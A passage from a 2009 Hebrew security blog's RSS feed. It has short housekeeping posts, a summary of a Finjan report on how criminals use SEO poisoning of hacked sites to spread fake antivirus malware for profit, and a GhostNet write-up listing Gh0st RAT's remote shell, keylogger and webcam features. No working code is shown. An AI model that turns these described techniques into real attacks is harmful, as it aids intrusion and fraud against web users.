לצורך כך היא העמידה פרס של 10000$ לראשון שיצליח לפרוץ את חשבון המייל של המנכ&quot;ל ולהוציא נתונים מלוח השנה שלו.</p>
<p>בקיצור &#8211; הם הצליחו <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1067&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1067/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1067?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫תם ונשלם הפרוייקט‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/lwtjpmeaD58/1064</link>
		<comments>http://www.hacking.org.il/1064#comments</comments>
		<pubDate>Thu, 11 Jun 2009 01:37:23 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1064</guid>
		<description><![CDATA[&#8235;סוף סוף &#8211; העברתי את הבלוג לשרת החדש.
אין יותר בעיות (כנראה).
הכל עובד חלק ומהיר 
אשמח לשמוע אם אתם רואים בעיה כלשהי.
זהו &#8211; אולי אחרי כל העבודה הזאת עוד יהיה לי כוח לכתוב משהו בסוף השבוע..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1064&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>סוף סוף &#8211; העברתי את הבלוג לשרת החדש.<br />
אין יותר בעיות (כנראה).<br />
הכל עובד חלק ומהיר <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /><br />
אשמח לשמוע אם אתם רואים בעיה כלשהי.<br />
זהו &#8211; אולי אחרי כל העבודה הזאת עוד יהיה לי כוח לכתוב משהו בסוף השבוע..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1064&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1064/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1064?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫בעיות.. הרבה בעיות.‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/a_jOXK_A2dk/1060</link>
		<comments>http://www.hacking.org.il/1060#comments</comments>
		<pubDate>Mon, 01 Jun 2009 20:15:26 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1060</guid>
		<description><![CDATA[&#8235;אני מחליף שרת לבלוג ויש המון בעיות.
משום מה &#8211; הבלוג עובר אבל לא מצליח להציג פוסטים ועוד לא הצלחתי להבין למה.
בטיפול..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1060&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אני מחליף שרת לבלוג ויש המון בעיות.<br />
משום מה &#8211; הבלוג עובר אבל לא מצליח להציג פוסטים ועוד לא הצלחתי להבין למה.<br />
בטיפול..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1060&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1060/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1060?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫איך האקר יכול להרוויח 10800$ ביום?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/_hDcEQkvGWo/1051</link>
		<comments>http://www.hacking.org.il/1051#comments</comments>
		<pubDate>Sat, 16 May 2009 20:01:23 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1051</guid>
		<description><![CDATA[&#8235;חברת Finjan מוציאה כל כמה חודשים דוחות על הפשיעה ברשת. החוקרים:  Finjan’s Malicious CodeResearch Center &#8211; MCRC.
הדו&#34;ח האחרון בא לספר לנו איך האקר יכול להרוויח 10800$ ביום והכותרת שלו היא: Cybercrime pays Generously &#8211; How hackers make $10,800 a day

אז איך עושים את זה?
האקרים (הכוונה כאן היא לפושעי-סייבר) מחפשים כל הזמן דרכים לשפר את הפצת [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1051&crtId=148&dt=1257940434">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חברת Finjan מוציאה כל כמה חודשים דוחות על הפשיעה ברשת. החוקרים:  Finjan’s Malicious CodeResearch Center &#8211; MCRC.<br />
הדו&quot;ח האחרון בא לספר לנו איך האקר יכול להרוויח 10800$ ביום והכותרת שלו היא: <strong>Cybercrime pays Generously &#8211; How hackers make $10,800 a day</strong><br />
<br />
<strong>אז איך עושים את זה?</strong><br />
האקרים (הכוונה כאן היא לפושעי-סייבר) מחפשים כל הזמן דרכים לשפר את הפצת ה-malware בהם הם משתמשים. איך הם עושים את זה?<br />
המטרה העיקרית שלהם היא להרוויח כמה שיותר כסף, אותו הם מרוויחים מכל מחשב שהדביקו.</p>
<p>הכסף מגיע כתוצאה מגניבת אינפורמציה, העברת DATA או מכירת תוכנות זדוניות.<br />
בשל כך המאמץ העיקרי של ההאקרים הוא להגדיל את יכולות ההפצה של ה-MALWARES שלהם.<br />
במקרים רבים ניתן לראות אתרים תמימים למראה שכשנכנסים אליהם נתקלים באתר עצמו ובהפניה לאתר נוסף שמתקין רושעה.<br />
המחקר של חברת פינג'אן נעשה על גוף של פושעי-סייבר שחברים ברשת צירופית שכזו (Affiliation Network).<br />
המחקר גם מפרט איך הם מרוויחים כסף בתהליך.</p>
<p>(למי שלא מכיר, affiliation זו צורה ידועה לקידום מסחר באינטרנט. הרעיון הוא יצירת לינק ייחודי עם הפנייה לכל מקדם מסחר. כשמישהו נכנס ללינק הייחודי ומגיע לאתר המפרסם הוא מגיע עם referrer של המקדם ולכן יודעים דרך מי הגולש הגיע וכך יודעים לשלם למקדם.)<br />
<br />
<strong>שימוש ב-SEO כדי להרחיב תפוצה:</strong><br />
ההפצה של הרושעות למינן מועתקת מהצורה הלגיטימית בה עובד השוק המסחרי, כולל Search Engine Optimization אך בצורה יעילה יותר ופחות לגיטימית.<br />
המפיצים משתמשים באתרים פריצים כדי להזריק לתוכם תוכן מותאם SEO ועל ידי כך מעלים את ערך הדפים (PR וכ&quot;ו) שיכולים להדביק.<br />
(PR – Page Rank. זוהי צורת מדידה בה גוגל משתמשת כדי לדרג כל דף שמאונדקס אצלה ולקביעת מידת הרלוונטיות שלו. ככל שה-PR גבוה יותר מדובר בדף חיוני יותר שמכיל יותר מידע ולכן גם מעניין יותר את הגולשים. האלגוריתם שמשמש את גוגל לקביעת PR אינו גלוי ויש כל מני השערות של איך בונים את ה-PR של דף אבל גוגל לא ממש מסבירים את זה.)</p>
<p>התוכן שהם מוסיפים כולל שגיאות כתיב נפוצות (כגון Gogle, mobile fone, Obbama, Liscense וכ&quot;ו) וכן מילות חיפוש נפוצות הנלקחות מ-google trends.</p>
<p>כשהדפים עם התוכן הזה נוספים לאתר שנפרץ המפיץ מנסה לגרום למנועי החיפוש לאנדקס את האתר מחדש ובשל התוכן החדש שנוסף, מיקומו של האתר יעלה בגוגל למקומות גבוהים.<br />
כדי לשפר את השיטה עוד יותר, חלק מהתוכן המוזרק הוא סקריפט שמייצר באופן דינאמי keywords עם שגיאות כתיב ומילים פופולאריות.</p>
<p>הסקריפט מבוסס על פרמטר שעובר כחלק מה-url בסגנון: http://domain/talk/page.php?id=2345 כאשר כל דף דינאמי מקושר לדפים דינאמיים אחרים וכך ערך האתר עולה כיוון מנוע החיפוש מזהה שיש בו יותר מידע.<br />
כשהאתרים עולים בדירוג שלהם ומופיעים כתוצאות ראשונות במנוע החיפוש – יותר אנשים נכנסים ומודבקים ברושעות של המפיץ.<br />
ההדבקה מתבצעת ע&quot;י הפניה לאתר מדביק (לעיתים כחלק מכמה קפיצות עד האתר הדבקה עצמו).</p>
<p>השיטה יעילה מאוד כיוון שהיא מצליחה להטעות את מנוע החיפוש שמאנדקס ומתייג את האתר כבעל תוכן משמעותי וכתוצאה מכך מספר הגולשים לאתר עולה באופן משמעותי מאוד.<br />
<br />
<strong>דוגמה:</strong><br />
משתמש מחפש את פרופסור Kris Kobach אך מקליד בטעות Korbach.</p>
<p><img class="aligncenter size-full wp-image-1052" title="finjan1" src="http://www.hacking.org.il/wp-content/uploads/2009/05/finjan1.jpg" alt="finjan1" width="544" height="270" /></p>
<p>שימו לב – ה-X שמצוין בתוצאת החיפוש מגיע כחלק מתוכנה של חברת פינג'אן – הוא לא מגיע מגוגל ולמחפש התמים אין שום דרך לדעת שמדובר בתוצאה שיקרית.</p>
<p>הדפים אליהם יגיע המשתמש התמים הם אלה (מצטער על חוסר האיכות – כך מופיע במקור):<br />
<img class="aligncenter size-full wp-image-1053" title="finjan2" src="http://www.hacking.org.il/wp-content/uploads/2009/05/finjan2.jpg" alt="finjan2" width="498" height="445" /></p>
<p>הבעיה: התוצאות לא רלוונטיות ורואים את זה מייד אך לפני שהמשתמש יוכל להבין שמדובר בתוצאה לא רלוונטית ירוץ עליו סקריפט.<br />
<br />
<strong>הסקריפט(חלקו לפחות):</strong></p>
<p><img class="aligncenter size-full wp-image-1054" title="finjan3" src="http://www.hacking.org.il/wp-content/uploads/2009/05/finjan3.jpg" alt="finjan3" width="508" height="119" /></p>
<p><strong>כמה הדבר אפקטיבי?</strong><br />
מאוד יעיל לצורך הדבקות בקנה מידה רחב מאוד.<br />
בגישה לאחד משרתי התעבורה של התוקפים גילו שהתקפות מסוג זה הביאו מעל לחצי מליון חיפושי גוגל לאתרים כאלה.<br />
התוקפים הבינו שצורה של הפצה כזו יעילה הרבה יותר מלהדביק  אתר אחד גדול כיוון שהתקפה כזו תתגלה בצורה מהירה יחסית ותתוקן בצורה מיידית ואילו כאן מדובר בהרבה מאוד אתרים שעושים את השירות.<br />
הזמן שחולף עד שהמתקפות מתגלות באתרים האלה הוא רב והתיקונים בד&quot;כ לא מתבצעים בצורה מהירה.<br />
<br />
<strong>מספרים:</strong><br />
ב-16 ימים של פעולה אותם מפיצי תוכנות (במקרה זה תוכנה שמזוהה כאילו כאנטי וירוס אך היא בעצם רושעה) הצליחו לקבל 1.8 מיליון unique users שעברו לדפי ההדבקה שלהם.המפיצים מקבלים 9.6 סנט על כל הפניה כזו ו<strong>הרווח הוא 10800$ ליום!</strong></p>
<p>כן, זה לא רע בשביל יום עבודה <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1051&crtId=148&dt=1257940434"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1051/feed</wfw:commentRss>
		<slash:comments>13</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1051?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫הפרטיות מתה – תתגברו על זה.‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/bcmumYZUw20/1049</link>
		<comments>http://www.hacking.org.il/1049#comments</comments>
		<pubDate>Sat, 16 May 2009 14:17:48 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1049</guid>
		<description><![CDATA[&#8235;אתם חייבים לראות את Privacy Is Dead &#8211; Get Over It. זה חלק ראשון מתוך 36 חלקים של כ-5 דקות כל אחד.
אחרי שתראו את זה, הייתי רוצה לשמוע את דעתכם.
אני אפרסם כאן את דעתי בעוד יומיים-שלושה.
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1049&crtId=148&dt=1257940434">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>אתם חייבים לראות את <a href="http://www.youtube.com/watch?v=Vsxxsrn2Tfs" target="_blank">Privacy Is Dead &#8211; Get Over It</a>. זה חלק ראשון מתוך 36 חלקים של כ-5 דקות כל אחד.</p>
<p>אחרי שתראו את זה, הייתי רוצה לשמוע את דעתכם.</p>
<p>אני אפרסם כאן את דעתי בעוד יומיים-שלושה.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1049&crtId=148&dt=1257940434"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1049/feed</wfw:commentRss>
		<slash:comments>15</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1049?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫עיצוב הבלוג‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/UBZscphgYxU/1047</link>
		<comments>http://www.hacking.org.il/1047#comments</comments>
		<pubDate>Tue, 12 May 2009 05:47:59 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1047</guid>
		<description><![CDATA[&#8235;חזרתי זמנית לעיצוב הישן &#8211; בחדש היו בעיות עם IE.
אני אנסה לפתור את הבעיות היום או מחר..
גיא.
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1047&crtId=148&dt=1257940434">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חזרתי זמנית לעיצוב הישן &#8211; בחדש היו בעיות עם IE.</p>
<p>אני אנסה לפתור את הבעיות היום או מחר..</p>
<p>גיא.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1047&crtId=148&dt=1257940434"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1047/feed</wfw:commentRss>
		<slash:comments>18</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1047?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫GhostNet – The Snooping Dragon – Part 2‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/LwM08RB_IiU/1023</link>
		<comments>http://www.hacking.org.il/1023#comments</comments>
		<pubDate>Sun, 10 May 2009 14:39:12 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1023</guid>
		<description><![CDATA[&#8235;לאחר המחקר הראשוני שנעשה ע&#34;י החוקרים(כתבתי עליו פה: the snooping dragon), התבצע מחקר ארוך יותר כדי להבין בצורה טובה יותר מי תקף ומה מימדי התקיפה.
המחקר ארך 10 חודשים והפעם נעשה בצורה עמוקה ויסודית יותר.
הדוח מחולק לשלושה חלקים:
1. הכרות עם התחום ומידע כללי. כולל האשמות של סין כמרגלת על ארה&#34;ב.
2. הסבר על החקירה עצמה.
3. ניתוח התוצאות.
החוקרים [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1023&crtId=148&dt=1257940434">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>לאחר המחקר הראשוני שנעשה ע&quot;י החוקרים(כתבתי עליו פה: <a href="http://www.hacking.org.il/?p=1014" target="_blank">the snooping dragon</a>), התבצע מחקר ארוך יותר כדי להבין בצורה טובה יותר מי תקף ומה מימדי התקיפה.<br />
המחקר ארך 10 חודשים והפעם נעשה בצורה עמוקה ויסודית יותר.<br />
הדוח מחולק לשלושה חלקים:<br />
1. הכרות עם התחום ומידע כללי. כולל האשמות של סין כמרגלת על ארה&quot;ב.<br />
2. הסבר על החקירה עצמה.<br />
3. ניתוח התוצאות.</p>
<p>החוקרים מציינים שהשחקנים העיקריים ב-cyberspace הן לא מדינות אלא האקרים עצמאיים.<br />
הם מציינים שפעילות הסייבר שהתבצעה במלחמה בין רוסיה לגאורגיה וכן בזמן התקפה של ישראל על עזה התבצעה ע&quot;י האקרים ולא ע&quot;י מדינות.<br />
הם מנחשים על סמך העובדה שהתקפת ה-DoS על אסטוניה ב-2007 התבצעה ע&quot;י רוסי שחי באסטוניה וכמו כן שמעולם לא הייתה התקפה של גוף ביון על ארה&quot;ב.</p>
<p>(הערה: לעניות דעתי זו טעות. ההסתמכות על ארה&quot;ב לא נכונה.. פקידים בכירים בממשל בארה&quot;ב מודים שהיו התקפות כאלה וניסיון לאתר אותן הגיע למחשבים בברית המועצות. במקום עובדות, הם לוקחים כדוגמאות את ה<a href="http://www.hacking.org.il/?p=993" target="_blank">אנאלייזר</a>.).</p>
<p>קוריוז: המדינות המובילות ב-Cyber Espionage: ארה&quot;ב, ישראל ובריטניה.</p>
<p><a href="http://en.wikipedia.org/wiki/Sigint" target="_blank">סיגינט</a>:<br />
בדו&quot;ח מסופר על מקרה בו עובדת לשעבר של Drewla נאסרה כשניסתה לחזור אל ביתה אחרי עבודה של שנתיים ב-Drewla.<br />
כשהיא הכחישה שעבדה שם וטענה שהיא הייתה בדרהמסלה בלימודים גילתה שהחוקר הסיני החזיק בידו תעתיק מלא של צ'אטים שלה במשך השנים.<br />
החוקרים מייחסים את העניין לסיגינט, אני לא בטוח שזה באמת מעיד על משהו.</p>
<p><strong>חלק 1:</strong></p>
<p>תחילת פעילות סין בסייבר – שנת 1991 כחלק ממודרניזציה של הצבא ותוך הבנה שפעילות סייבר יכולה לפגוע קשות בעליונותה של ארה&quot;ב.<br />
נוצרה שם הבנה שפעילות תוקפנית שכזו יכולה לפגוע במטרות צבאיות ואזרחיות.<br />
בשנים האחרונות עלו יותר ויותר האשמות שהאקרים סינים אחראים לפריצות איכותיות למחשבים באירופה, צפון אמריקה ואסיה.<br />
האקרים סינים הואשמו בפעילות וחדירה למחשבים ממשלתיים בארה&quot;ב, בריטניה, צרפת, גרמניה, דרום קוריאה וטאיוון.<br />
האקרים סינים הואשמו בגניבת נתונים ממחשבים במוסדות תעשייתיים ופיננסיים.<br />
משרד ההגנה האמריקאי מדווח שהוא מותקף באופן תדיר ע&quot;י האקרים סינים כאשר ההתקפה הבולטת ביותר נקראה &quot;<a href="http://en.wikipedia.org/wiki/Titan_Rain" target="_blank">Titan Rain</a>&quot;, בוצעה ב-2003 וכוונה אל מחשבי משרד ההגנה וחברות ביטחוניות נוספות.</p>
<p>יש האשמה נוספת שסין פעילה נגד ארגונים לא צבאיים אך שיש לה בהם עניין (קונפליקט בדרפור, קבוצות טיבטיות בהודו וכ&quot;ו).<br />
רוב ההתקפות מול ארגונים אלה כוללות Defacements, התקפות מניעת שירות (DoS) או יצירת וירוסים מכוונים.<br />
פעילויות אלה מוקצנות ומגברות בזמן משבר.</p>
<p>למרות ההאשמות האלה אין ממש ידע מי מבצע את הפעילות ואין אפשרות להחליט האם זה פעילות של יחידים או של גוף ממשלתי, למרות שההתקפות בהחלט פועלות בהתאם למדיניות ולתחומי העניין הסיניים.</p>
<p><strong>חלק 3+2:</strong></p>
<p>החקירה התחילה כאמור ממחשבי הארגון הטיבטי וממחשבים אלה התוקפים קיבלו מידע מקיף ורגיש.<br />
המחקר נערך מול המחשבים של OHHDL.<br />
המחקר לא מוכיח מי עומד מאחורי המתקפה וכן מה הייתה המטרה שלה.<br />
במהלך המחקר הארוך נמצאו 1295 מחשבים נגועים ב-103 מדינות מתוכם כ-30% נחשבים מקור מידע מעולה וממוקמים במשרדי חוץ, שגרירויות, ארגונים בין לאומיים, מקורות עיתונאים וכ&quot;ו.</p>
<p>במחקר הזה &#8211; החוקרים מכנים את הרשת בשם GhostNet והמחקר נערך מיוני 2008 ועד מרץ 2009 והתחיל בשלב הראשון בטיבט, לונדון, בריסל וניו יורק – בתוך המשרדים של הדלאי לאמה.<br />
בשלב זה נאסף חומר החקירה כולל הסנפות של הרשתות.<br />
בשלב השני של המחקר נערך ניתוח של הנתונים שנאספו והחוקרים מצאו קישור אל 4 שרתים ב- WEB. שרתים אלה שימשו את התוקפים להתקנת הסוס.</p>
<p>נמצאו גם 6 שרתים נוספים -  שרתי פיקודים שאליהם התחבר הסוס כדי לקבל פקודות.<br />
השרתים קונפגו לעבוד עם שירותי DNS דינאמיים.<br />
בבדיקת שרתים אלה התגלה היקף הרשת (שכאמור כוללת 1295 מחשבים).<br />
30% מהמחשבים הנגועים נחשבים בעלי ערך ונמצאים ב:</p>
<p>ministries of foreign affairs of Iran, Bangladesh, Latvia, Indonesia, Philippines, Brunei, Barbados and Bhutan;<br />
embassies of India, South Korea, Indonesia, Romania, Cyprus, Malta, Thailand, Taiwan, Portugal, Germany and Pakistan;<br />
the ASEAN (Association of Southeast Asian Nations) Secretariat, SAARC (South Asian Association for Regional Cooperation), and the Asian Development Bank;<br />
News organizations<br />
and an unclassified computer located at NATO headquarters.</p>
<p>GhostNet מורה למחשב נגוע להוריד טרויאן ידוע בשם Gh0st RAT – סוס אמיתי שמאפשר יכולות real-time.</p>
<p>Gh0st RAT נמכר באינטרנט והמקורות שלו בסין (במקור הוא OPEN SOURCE, כיום נמכר כשהוא מוכן לעבודה ע&quot;י גופים פחות מקצועיים. כדי שאנטי וירוסים לא יזהו אותו המוכרים מבצעים שינויים שמות של משתנים, שינוי שמות פונקציות ועוד פעולות בסיסיות שמשנות את החתימה שלו).</p>
<p>מה הוא יודע לעשות?</p>
<p>- העברת קבצים</p>
<p>- לכידת מסך</p>
<p>- KEYLOGGER</p>
<p>- Remote shell</p>
<p>- Webcam view</p>
<p>- Audio capture</p>
<p>- הפעלת תוכנות</p>
<p>- Install software as system</p>
<p>ממשק השליטה שלו נראה כך:</p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"><img class="aligncenter size-full wp-image-1024" title="ממשק שליטה של Gh0st Rat" src="http://www.hacking.org.il/wp-content/uploads/2009/05/gr1.jpg" alt="ממשק שליטה של Gh0st Rat" width="604" height="365" /></span><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>HE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" 